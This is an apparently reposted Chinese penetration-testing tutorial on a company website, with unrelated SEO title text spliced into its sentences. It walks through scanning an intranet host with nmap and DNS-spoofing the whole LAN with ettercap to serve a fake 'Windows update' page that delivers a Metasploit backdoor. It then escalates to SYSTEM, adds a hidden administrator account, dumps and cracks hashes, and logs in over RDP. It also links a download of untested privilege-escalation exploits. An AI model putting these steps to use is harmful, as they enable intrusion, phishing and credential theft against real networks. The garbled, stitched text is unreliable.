歡迎光臨陜西驪山低速風(fēng)機(jī)動力制造有限公司官網(wǎng)!

全國咨詢熱線:

400-8888-888

如何讓單位的內(nèi)網(wǎng)電腦上外網(wǎng)_怎么讓公司電腦上外網(wǎng)

所屬分類:行業(yè)新聞 發(fā)布日期:2024-08-29 瀏覽次數(shù):7

  本機(jī)ubuntu IP如何讓單位的內(nèi)網(wǎng)電腦上外網(wǎng):192.168.0.3

  虛擬機(jī)03主機(jī) IP如何讓單位的內(nèi)網(wǎng)電腦上外網(wǎng):192.168.0.128

  我們先來模擬一下 比如我拿到了我本機(jī)192.168.0.3 這臺服務(wù)器的管理權(quán)限后 我是如何繼續(xù)滲透192.168.0.128這臺主機(jī)的首先在內(nèi)網(wǎng)滲透中最常用的就是信息收集以及端口掃描說起端口掃描和主機(jī)信息收集 大家不得不想到了nmap

  nmap

  nmap是一個網(wǎng)絡(luò)連接端掃描軟件如何讓單位的內(nèi)網(wǎng)電腦上外網(wǎng),用來掃描網(wǎng)上電腦開放的網(wǎng)絡(luò)連接端。確定哪些服務(wù)運(yùn)行在哪些連接端,并且推斷計算機(jī)運(yùn)行哪個操作系統(tǒng)(這是亦稱 fingerprinting)。它是網(wǎng)絡(luò)管理員必用的軟件之一,以及用以評估網(wǎng)絡(luò)系統(tǒng)安全。

  正如大多數(shù)被用于網(wǎng)絡(luò)安全的工具,nmap 也是不少黑客及駭客(又稱腳本小子)愛用的工具 。系統(tǒng)管理員可以利用nmap來探測工作環(huán)境中未經(jīng)批準(zhǔn)使用的服務(wù)器,但是黑客會利用nmap來搜集目標(biāo)電腦的網(wǎng)絡(luò)設(shè)定,從而計劃攻擊的方法。

  Nmap 常被跟評估系統(tǒng)漏洞軟件Nessus 混為一談。Nmap 以隱秘的手法,避開闖入檢測系統(tǒng)的監(jiān)視,并盡可能不影響目標(biāo)系統(tǒng)的日常操作。

  Nmap 在黑客帝國(The Matrix)中,連同SSH1的32位元循環(huán)冗余校驗(yàn)漏洞,被崔妮蒂用以入侵發(fā)電站的能源管理系統(tǒng)。

 如何讓單位的內(nèi)網(wǎng)電腦上外網(wǎng)_怎么讓公司電腦上外網(wǎng)

  另外更多nmap相關(guān)信息 請到百度百科查看 太多 全搬過來的話 界面就不是特別美觀了https://baike.baidu.com/link?url=iKwQ4Q3iLG8zBo5mWA4z_GQ-vvFmqFjgi70x5PzDy0rn68KHQ5qyAZgdxv9Yf22aurOik7eAb2o2o_SYbGrKiq

  我們用nmap的Intense scan模塊 來掃描 192.168.0.128 這臺主機(jī) 是在內(nèi)網(wǎng)中 掃描端口開放信息以及主機(jī)信息等一系列信息~ Intense scan 模塊可以滿足一般的掃描 如果如何讓單位的內(nèi)網(wǎng)電腦上外網(wǎng)你要掃描內(nèi)網(wǎng)主機(jī)的話 nmap 192.168.0.1/24 即可 192.168.0.1 是我的路由器地址

  nmap -T4 -A -v 192.168.0.128

  這里我們不得不說一下 nmap確實(shí)很強(qiáng)大 下面為輸出結(jié)果

  我們得知主機(jī)系統(tǒng)為 Windows2003 用戶組 版本信息 端口信息 開放了3389當(dāng)然 nmap有很多插件 可以掃描主機(jī)漏洞問題 那個我沒找到= =

  咳咳配置Metasploit exe后門

  ps:默認(rèn)端口4444

  有的主機(jī)可以配合Metasploit溢出滲透xp 那樣直接獲取到一個cmd執(zhí)行權(quán)限 本臺主機(jī)我看了下 沒有遠(yuǎn)程溢出問題 補(bǔ)丁都打好了。

  主機(jī)開放3389 后 而且是在內(nèi)網(wǎng) 那么我們dns欺騙 內(nèi)網(wǎng)全部主機(jī)的dns 我們寫一個html界面 提示如何讓單位的內(nèi)網(wǎng)電腦上外網(wǎng)你電腦存在xx漏洞 打補(bǔ)丁 后門改名字可以改為 Windows update.exe html界面越逼真越好。

  ettercap -T -i wlp2s0 -q -P dns_spoof /// ///

  下面為輸出結(jié)果參數(shù)問題:

  -T文本模式 -i接要欺騙的適配器 -q安靜模式 -P dns_spoof調(diào)用這個插件 /// ///代表所有IP和子網(wǎng)掩碼

  對方主機(jī)打開任何網(wǎng)站 都會成為我本機(jī)的index.html

  Linux的 index.html在/var/www/html/目錄

  直接gedit /var/www/html/index.html 即可編輯

  首先你要先進(jìn)入root狀態(tài)

  不然只能讀 不能寫

  上面說了 03主機(jī)是受害者 這里我假裝上當(dāng)了

  打開了后門

  這里我們的msf上線了

  幫助信息

  

  首先我們先來讀取下192.168.0.128這臺主機(jī)的hash數(shù)值

  當(dāng)然 這些數(shù)值不好解密 咳咳

  有提權(quán)exp 可以直接顯示hash值 解密后的

  getsystem 獲取最高權(quán)限

  shell 進(jìn)入cmd提權(quán)

  我們成功獲取到了最高權(quán)限 進(jìn)入到了c盤 Windows system32的cmd.exe直接一條命令 即可添加用戶&管理員權(quán)限

  net user xaisec xaisec /add & net localgroup administrators xaisec /add

  連接192.168.0.128 這臺主機(jī) rdesktop

  沒有rdesktop的 可以apt-get install rdesktop 安裝

  rdesktop -h 參數(shù)

  rdesktop 192.168.0.128 -u xaisec -p xaisec

  -u 是用戶名的意思 -p是密碼

  讀取解密哈希值

  hash下

  administrator admin

  xaisec xaisec

 如何讓單位的內(nèi)網(wǎng)電腦上外網(wǎng)_怎么讓公司電腦上外網(wǎng)

  使用administrator登錄

  rdesktop 192.168.0.128 -u administrator -p admin

  最后 我整理了下提權(quán)exp 有的沒有測試 不清楚有沒有后門自行檢查

  鏈接: https://pan.baidu.com/s/1i56zH0T 密碼: qdhm

  作者:小愛_Joker

  來源:i春秋

  鏈接:https://bbs.ichunqiu.com/thread-20514-1-1.html

煉石信息安全培訓(xùn)春季班開招

QQ:495066536

372806985

敬請持續(xù)關(guān)注……

評論列表

還沒有評論,快來說點(diǎn)什么吧~

發(fā)表評論

真誠期待與您的合作

獲取報價·了解更多業(yè)務(wù)·7*24小時專業(yè)服務(wù)

聯(lián)系我們